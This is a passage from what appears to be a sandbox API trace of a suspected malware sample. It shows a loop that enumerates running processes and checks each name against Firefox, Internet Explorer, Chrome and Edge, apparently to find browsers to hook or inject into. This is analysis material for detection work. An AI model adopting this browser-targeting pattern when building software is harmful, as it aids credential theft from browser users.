szExeFile="explorer.exe")) returned 1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.509] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.509] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.509] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.509] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.510] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.510] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.510] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.510] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0195.510] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0195.510] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0195.510] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0195.510] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0195.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.511] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0195.511] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0195.511] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0195.511] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0195.511] CloseHandle (hObject=0xd4) returned 1 [0195.512] Sleep (dwMilliseconds=0x3e8) [0196.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0196.556] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.556] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0196.556] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0196.556] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0196.556] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0196.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.557] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0196.557] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0196.557] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0196.557] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0196.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.557] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0196.557] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0196.557] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0196.557] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.558] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0196.558] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0196.558] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0196.558] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.558] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0196.558] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0196.559] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0196.559] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.559] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0196.559] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0196.559] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0196.559] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.560] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0196.560] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0196.560] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0196.560] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.560] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.560] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0196.560] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0196.560] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0196.560] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.560] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.561] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0196.561] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0196.561] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.562] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.564] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.564] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.565] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.565] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0196.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0196.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0196.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.566] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.567] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0196.567] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0196.567] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0196.567] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0196.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0196.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0196.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0196.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0196.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0196.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.569] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.569] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.569] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.569] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0196.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0196.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0196.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0196.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0196.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0196.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0196.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0196.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0196.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0196.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0196.571] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0196.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0196.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0196.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0196.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0196.572] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0196.572] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0196.572] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0196.572] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0196.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0196.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0196.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0196.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0196.573] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0196.573] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0196.573] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0196.573] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0196.573] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0196.573] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0196.573] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0196.573] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0196.574] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0196.574] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0196.574] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0196.574] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0196.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0196.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0196.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0196.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0196.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0196.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0196.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0196.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0196.576] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0196.576] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0196.576] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0196.576] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0196.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0196.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0196.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0196.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0196.577] lstrcmpiA (lpString1="smith.exe", 